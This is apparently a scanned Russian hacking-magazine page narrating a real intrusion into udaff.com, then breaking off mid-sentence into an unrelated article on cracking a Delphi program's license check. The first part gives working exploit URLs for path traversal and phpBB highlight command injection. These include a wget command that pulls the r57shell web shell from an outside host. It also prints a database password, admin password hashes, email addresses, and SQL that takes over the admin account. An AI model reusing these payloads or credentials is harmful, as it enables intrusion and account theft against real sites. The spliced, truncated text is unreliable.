книги хакеры / журнал хакер / 085_Optimized

TEXT MAG / MAG@WAPP.RU /

ОТ ПЕРВОГО ЛИЦА

При первом взгляде на формат ссылок на сайте (например, http://udaff.com/creo/51377.html) стало понятно, что движок использует mod_rewrite web-сервера Apache. Действительно, глупо было предполагать, что на сервере в папках хранится куча html-файлов :). Это не есть гуд, нельзя в параметры, передаваемые скрипту, ставить кавыч- ку и прочие нехорошие символы. Тогда я стал изучать альтернативные проекты Удава, ссылки на которые присутствуют на главной странице. Первым делом я попал на http://news.udaff.com. Здесь уже не использовался мод_рерайт. Это уже лучше. Можно поиграть с параметрами. Я перешел по ссылке на новость http://news.udaff.com/ index.php?cat=vov2&news=1, подставив в параметр news=1' кавычку. Система выдала мне ошибку:

Warning: fopen(news/vov2/1'): failed to open stream: No such file or directory in /home/udaff.com/news/news.udaff.com/news.php on line 3

Не могу открыть файл.

ПАДОНКИ ЖЖУТ

Вау! Эта ошибка должна позволить нам прочитать любые файлы на системе! Что я и сделал, перейдя по такой ссылке: http://news.udaff.com/index.php?cat=..&news=index.php

Здесь cat-каталог, news-файл. На эту ссылку скрипт выплюнул мне страницу, где имелось следующее:

$catnames = array ("incidents" => "Проишэствия", "politic" => "Политека", "economic" => "Иканомека", "obscestvo" => "Обсче- ство", "tech" => "Ноука и техника", "medic" => "Медецына", "sport" => "Спорт", "nature" => "Прерода", "reports" => "Рипартажы", "vov2" => "ВОВ 2", "sluzhebnaya" => "Служебная"); ::

и штук 15 таких ошибок:

Warning: stristr(): Empty delimiter. in /home/udaff.com/news/news.udaff.com/news.php on line 152

То есть скрипт читал почему-то только первые n-символы из файла. Поэкспериментировав еще c несколькими файлами, я понял, что тут делать нечего. Тогда я пошел дальше. Следующим объектом для изучения стал http://flash.udaff.com. Здесь можно скачать падоначьи флешки со страницы http://flash.udaff.com/ indaflashki.php. И вот что мы получим, подставив в параметр id кавычку:

Warning: main(header'.inc): failed to open stream: No such file or directory in /home/udaff.com/flash/html/flashka.php on line 96

Warning: main(): Failed opening 'header'.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/udaff.com/flash/html/flashka.php on line 96

Тут можно поиграть с инклудом, вставив в конце ссылки символ конца строки %00, например, перейдя на http://flash.udaff.com/ flashka.php?id=./flashka.php%00, мы получим такую ошибку:

Warning: main(header./flashka.php): failed to open stream: No such file or directory in /home/udaff.com/flash/html/flashka.php on line 96

Опять нам это ничего особого не даст. Я пытался, но ничего хорошего заинклудить не удалось. Тут я уже начал злиться и зарядил в гугл следующий запрос для поиска:

inurl:"udaff.com" filetype:php

МОРОЗНОЕ СОЛНЦЕ

Любимый поисковик выдал здоровую кучу линков. Побродив по ним, я наткнулся на один интересный сайт: http://sunfreez.udaff.com (http://pesdec.com). А интересен он был тем, что на нем установлена нюка со старой (2.0.8) версией популярного форума phpBB. Все, наверно, знают знаменитую дырку с highlight-параметром во всех версиях этого форума до 2.0.10 включительно, которую я незамедлительно и начал использовать :). Первым делом я выяснил,

есть ли на серваке wget, запросив следующий адрес:

http://sunfreez.udaff.com/modules.php?name=Forums&file=view topic&t=108&highlight=%2527.$poster=`$hera`.%2527&hera=w hich%20wget

Wget на сервере был (/usr/bin/wget), но теперь нужна была директория, открытая для записи, куда можно было бы залить более удобный web-шелл. Для поиска таковой я воспользовался утилитой find:

http://sunfreez.udaff.com/modules.php?name=Forums&file=view topic&t=108&highlight=%2527.$poster=`$hera`.%2527&hera=fi nd ./ type d -perm 0777 -ls

Таких директорий оказалось три: gallery/albums, gallery/albums/edit

è gallery/albums/userpics. Оставалось только залить удобный вебшелл, что я и сделал, в качестве готового решения использовав хваленый r57shell. Выполнив команду

http://sunfreez.udaff.com/modules.php?name=Forums&file=view topic&t=108&highlight=%2527.$poster=%60$hera%60.%2527& hera=wget%20- O%20./gallery/albums/userpics/userfiles.php%20http://rst.void.r u/download/r57shell.txt,

я получил полноценный web-шелл по адресу: http://sunfreez.udaff.com/gallery/albums/userpics/userfiles.php. Посмотрев на используемую систему и демоны, я понял, что проэксплойтить систему вряд ли удастся, так как я еще не видел публичных сплоитов под установленные сервисы, да Linux 2.6.13.3 на тот момент даже локально не пробивался. Поэтому я поставил себе основной задачей проникновение в админку Удава. Чем и занялся дальше.

САМ СЕБЕ ПРОФОРГ

Сначала путем нехитрых логических рассуждений я вычислил директорию, где находился основной сайт (/home/www/udaff.com/), далее, просмотрев листинг файлов и каталогов, можно понять, что админка находится в adm/, а параметры подключения к базе данных, которые нам и надо узнать, — в файлике kernel.ini.php. Открыв его, я увидел следующее:

password = "FogOnjuhayg8";

Хе-хе, здесь используется постгрес, а у меня на ноуте как раз валялся phpPgAdmin, который я и залил в уже известную папку, доступную для записи.

Перейдя по ссылке http://sunfreez.udaff.com/gallery/albums/userpics/users, я увидел форму для логина. Но, чтобы все заработало, сначала надо было настроить конфигурационный файл

phpPgAdmin, который находился по адресу:

/home/sites/pesdec.com/html/gallery/albums/userpics/users/conf

/config.inc.php

Я изменил только следующие параметры:

$conf['servers'][0]['desc'] = 'psql'; $conf['servers'][0]['host'] = 'psql'; $conf['servers'][0]['defaultdb'] = 'udaff';

Теперь можно было залогиниваться на наш pg-сервак с полу- ченными ранее логином и паролем, что я тут же и проделал. Скрипт выдал мне кучу баз данных, но мне нужна была только одна — udaff :). Так как phpPgAdmin не позволяет прямо в браузере просматривать структуру баз данных, то я начал сливать дамп этой базы. Дойдя до места, где были строки:

INSERT INTO ra_users VALUES (1, 'proforg', '3226139f7e09e6c29f9fc9520acf209b', 'proforg@maloletka.ru', 'proforg', '');

INSERT INTO ra_users VALUES (2, 'vaikon', '3226139f7e09e6c29f9fc9520acf209b', 'vaikon@idbh.ru', 'vaikon', '');

я остановился, так как видел запросы к этой таблице в файле, который отвечал за авторизацию в админке :). Нового пользователя в админку я добавлять не стал, а всего лишь соорудил небольшой скрипт со следующим содержанием:

<?

print md5('12345'); ?>

Сценарий, успешно выполнившись, выдал мне md5-хэш строки 12345. Далее последовал следующий запрос к базе данных:

UPDATE ra_users SET passwd='827ccb0eea8a706c4c34a16891f84e7b' WHERE login='proforg'

Этим запросом мы установили пароль 12345 админу proforg :). Думаю, теперь можно наведаться в админку по адресу: http://udaff.com/adm. После успешного входа в админку с логином proforg и паролем 12345, я, чтобы не палиться, вернул профоргу старый пароль запросом:

UPDATE ra_users SET passwd='3226139f7e09e6c29f9fc9520acf209b' WHERE login='proforg'

АДМИНИМ УДАФФ

Поскольку у меня уже были админские куки, я принялся активно изучать админский интерфейс. Надо заметить, что куки на Удаве не привязываются к конкретному айпишнику, то есть можно спокойно сидеть под админом, и никто ничего не заметит. На этом я

RSA-KEYS >

в левой части код — ДО запуска программы, в правой — ПОСЛЕ

шедевр usability: диалог регистрации программы

взлом пароля к архиву

Все в точности, как и писал автор. Генерируется «код вашей ЭВМ», который нужно отослать автору, в ответ надо ввести присланный код. Мы вводим любые цифры, но сообщений никаких не выдается. Придется догадываться самим. Вариантов много, поэтому я просто запустил программу — проверить что будет. Однако прога запустилась с ошибкой, да и при нажатии на любую иконку она вылетает (там где раньше было сообщение о демоверсии). Понятно, код-то у нас неверный. Теперь можно запускать свои любимые отладчики и дизассемблеры. У меня это — OllyDbg и IDA, в дальнейшем всю работу будем проводить в них. Конечно, наш любимый DeDe тоже может помочь. Благо программа написана на Delphi и ничем не пакована (достаточно редкий случай в наше время).

Так как ошибка появляется после сплеш-формы и до открытия основного окна, то поставим в отладчике бряк на TForm1. Form Create. Адрес 0091E050 нам подскажет DeDe. Запустив программу под отладчиком и остановившись в нужном нам месте, немного потрейсим код до появления ошибки, попутно отмечая, что делает программа, но не вдаваясь в подробности. Кажется, что программа делает совершенно не нужные ей действия: считывает серийные номера дисков, дату и версию BIOS, читает наш введенный код из файла ñheckSum.dat и даже проверяет наличие отладчика SoftIce.

код, расшифровываемый во время выполнения

Что интересно, этот кусок кода расшифровывается во время выполнения программы, если посмотреть листинг в IDA, то там будет совершенно другой код.

На рисунке в левой части находится код ДО запуска программы, в правой — ПОСЛЕ запуска. Разница очевидна. Значит, мы на верном пути, если автор решил эту часть скрыть. Поэтому придется запустить программу, чтобы раскриптовались все участки, и использовать функцию DeDe «Дампить активный процесс». Отметим, что ошибка вылетает при вызове процедуры по адресу 91F201:

код, на котором вылетает ошибка

0091F223 MOV EAX,DWORD PTR SS:[EBP-4]

0091F226 MOV EAX,DWORD PTR DS:[EAX+628]

0091F22C CALL SuperSol.0092E640

0091F231 JMP SHORT SuperSol.0091F23D

ЖЕЛЕЗНЫЙ БРЯК

В ЕАХ лежит указатель на наш введенный неправильный код. Если посмотреть чуть ниже, станет очевидно, что программа нормально запустится, если успешно выполнить сравнения по адре-